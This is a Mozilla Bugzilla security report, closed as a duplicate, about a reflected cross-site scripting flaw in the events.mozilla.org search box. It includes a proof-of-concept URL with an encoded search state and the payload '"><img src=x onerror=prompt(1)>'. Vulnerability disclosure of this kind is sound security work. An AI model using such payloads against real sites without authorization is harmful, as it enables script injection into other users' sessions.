Closed Bug 1367383 Opened 7 years ago Closed 7 years ago

XSS at search box events.mozilla.org

Categories

(Websites :: Other, defect)

Product:
Websites
Component:
Other
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

(Not tracked)

Status:
RESOLVED DUPLICATE of bug 1142658

People

(Reporter: depu1994, Unassigned)

Details

Attachments

(1 file)

xss-mozila.png
245.99 KB, image/png
Details
Attached image xss-mozila.png 
User Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36

Steps to reproduce:

Hi,

There is xss in seach box.
URL:
https://events.mozilla.org/portal/events/#search/advanced/eyJkIjpbMjMsMSwxNF0sImUiOlswLDQsMl0sImYiOlswLDAsMF0sImciOlszMjAsIlwiPjxpbWcgc3JjPXggb25lcnJvcj1wcm9tcHQoMSk+IiwiXCI+PGltZyBzcmM9eCBvbmVycm9yPXByb21wdCgxKT4iXSwiaCI6WyIiLCIiLCIiXSwiaSI6WyIiLCIiLCIiXX0=


Actual results:

playlaod:
"><img src=x onerror=prompt(1)>


Expected results:

Put playloads in search box.
It will triggered xss pop up.
Group: core-security
Status: UNCONFIRMED → RESOLVED
Closed: 7 years ago
Component: Untriaged → Other
Flags: sec-bounty-
Product: Core → Websites
Resolution: --- → DUPLICATE
Version: 50 Branch → unspecified
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: